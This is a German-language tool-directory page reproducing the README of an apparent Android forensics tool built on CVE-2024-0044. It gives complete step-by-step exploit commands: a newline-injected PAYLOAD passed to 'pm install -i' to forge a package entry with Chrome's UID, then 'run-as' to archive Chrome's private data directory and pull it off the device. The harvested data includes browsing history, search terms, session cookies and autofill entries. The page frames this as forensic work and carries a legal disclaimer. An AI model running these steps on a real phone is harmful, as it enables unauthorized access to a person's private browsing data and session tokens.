Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Chrome-Forensic_CVE-2024-0044 — Ein robustes digitales Forensik-Tool zur Extraktion und Analyse von Google Chrome-Artefakten von Android-Geräten. | Kitploit
Tools/GitHubGitHub/jacktekno/chrome-forensic_cve-2024-0044
Android-SicherheitSchwachstellenanalyseExploitationForensikMobile ForensikDatenwiederherstellungDigitale ForensikMobile SicherheitLernen & Bildung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubjacktekno/chrome-forensic_cve-2024-0044

Chrome-Forensic_CVE-2024-0044

Ein robustes digitales Forensik-Tool zur Extraktion und Analyse von Google Chrome-Artefakten von Android-Geräten.

Repository anzeigen
110vor 8 MonatenNoch nicht geprüft

🔍 Chrome Forensik - CVE-2024-0044

Version Python License Platform

Ein robustes digitales Forensik-Tool zum Extrahieren und Analysieren von Google-Chrome-Artefakten von Android-Geräten

Funktionen • Installation • Nutzung • Dokumentation


👤 Autoreninfo

Autor: JackTekno
GitHub: github.com/JackTekno


📋 Übersicht

Dieses Tool nutzt die CVE-2024-0044 (Run-as)-Sicherheitslücke, um Berechtigungsbeschränkungen auf nicht gerooteten Android 12/13-Geräten zu umgehen und eine forensische Extraktion von Google-Chrome-Daten zu ermöglichen. Das Tool analysiert rohe SQLite-Datenbanken und erstellt umfassende Analyseberichte.

🔄 Prozessablauf

Forensisches Analyse-Flussdiagramm

Vollständiger forensischer Analyseworkflow von der Erfassung bis zur Berichterstattung


📊 Funktionen & Ausgabe

Das Tool erstellt einen umfassenden Excel-Bericht (result_chrome_forensic.xlsx) mit den folgenden Blättern:


🛠️ Voraussetzungen

Hardware-Anforderungen

  • 📱 Android-Telefon (Android 12/13)
  • 💻 PC (Linux/Windows/Mac)

Getestete Umgebung

  • 🐧 Betriebssystem: Linux UOS 20 Professional

Software-Anforderungen

  • 🐍 Python 3.x
  • 📲 ADB (Android Debug Bridge)
  • 📦 Dummy-APK-Datei (z. B. F-Droid.apk)

🚀 Installation

  1. Repository klonen

    root@kitploit:~
    git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
    cd Chrome-Forensic_CVE-2024-0044
    
  2. Abhängigkeiten installieren

    root@kitploit:~
    pip install -r requirements.txt
    

🔓 Datenerfassungsanleitung

Schritt 1: Gerät vorbereiten

  1. Navigieren Sie zu Einstellungen → Über das Telefon
  2. Tippen Sie 7 Mal auf Build-Nummer, um die Entwickleroptionen zu aktivieren
  3. Gehen Sie zu Einstellungen → System → Entwickleroptionen
  4. Aktivieren Sie USB-Debugging
  5. Verbinden Sie das Telefon per USB mit dem PC und autorisieren Sie die Verbindung

Schritt 2: Exploit vorbereiten

root@kitploit:~
# Push a dummy APK to temporary folder
adb push F-Droid.apk /data/local/tmp/base.apk

Schritt 3: Ziel-UID finden

root@kitploit:~
adb shell pm list packages -U | grep com.android.chrome
# Output example: package:com.android.chrome uid:10129
# Note the UID (e.g., 10129)

Schritt 4: Exploit ausführen

⚠️ Ersetzen Sie 10129 durch Ihre tatsächliche Chrome-UID aus Schritt 3

root@kitploit:~
adb shell

# Inside ADB Shell:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"

# Trigger the package manager
pm install -i "$PAYLOAD" /data/local/tmp/base.apk

Schritt 5: Daten extrahieren

root@kitploit:~
# Still inside ADB Shell
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar

# Exit ADB Shell
exit

Schritt 6: Daten auf PC ziehen

root@kitploit:~
adb pull /data/local/tmp/chrome.tar .

Schritt 7: Daten entpacken

Entpacken Sie die Datei chrome.tar im Projektordner. Sie müssen Dateien nicht manuell verschieben. Das Python-Skript findet die Datenbankdateien automatisch in den entpackten Ordnern.

root@kitploit:~
tar -xf chrome.tar

💻 Nutzung

Führen Sie das forensische Analysetool aus:

root@kitploit:~
python3 chrome_forensic.py

Das Tool analysiert die Datenbankdateien und erzeugt result_chrome_forensic.xlsx im selben Verzeichnis.


⚖️ Rechtlicher Hinweis

⚠️ WICHTIG: Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte forensische Analysen bestimmt.

  • Verwenden Sie es nur auf Geräten, die Ihnen gehören oder für deren Analyse Sie eine ausdrückliche schriftliche Genehmigung haben.
  • Unautorisierter Zugriff auf digitale Geräte kann gegen Gesetze in Ihrem Land verstoßen.
  • Die Autoren übernehmen keine Haftung für Missbrauch dieses Tools.

🤝 Mitwirken

Beiträge sind willkommen! Bitte zögern Sie nicht, einen Pull-Request zu stellen.


📄 Lizenz

Dieses Projekt ist unter der GNU General Public License v3.0 lizenziert. Siehe die Datei LICENSE für Details.


👤 Danksagung

Der Proof of Concept für die Erfassungsmethode wurde von Tinyhack.com zusammengefasst und geteilt.


Mit ❤️ gemacht von JackTekno

⭐ Stern auf dieses Repository • 🐛 Fehler melden • 💡 Funktion anfordern

Tool herunterladen
BlattnameBeschreibung
📖 Browsing HistoryDetaillierte Zeitleiste besuchter URLs
📈 Analytics – Top SitesStatistisches Ranking der am häufigsten besuchten Domains
⚠️ ALERTS – SuspiciousAutomatisch markierte URLs (Hacking, Drogen, Erwachseneninhalte)
📥 DownloadsDownload-Verlauf mit Pfaden und Dateigrößen
🔍 Search TermsSuchanfragen des Benutzers aus Omnibox/Google
🍪 Cookies & SessionsSitzungstokens und Cookie-Metadaten (hexverschlüsselt)
✍️ Autofill DataGespeicherte Formulardaten (Namen, Adressen usw.)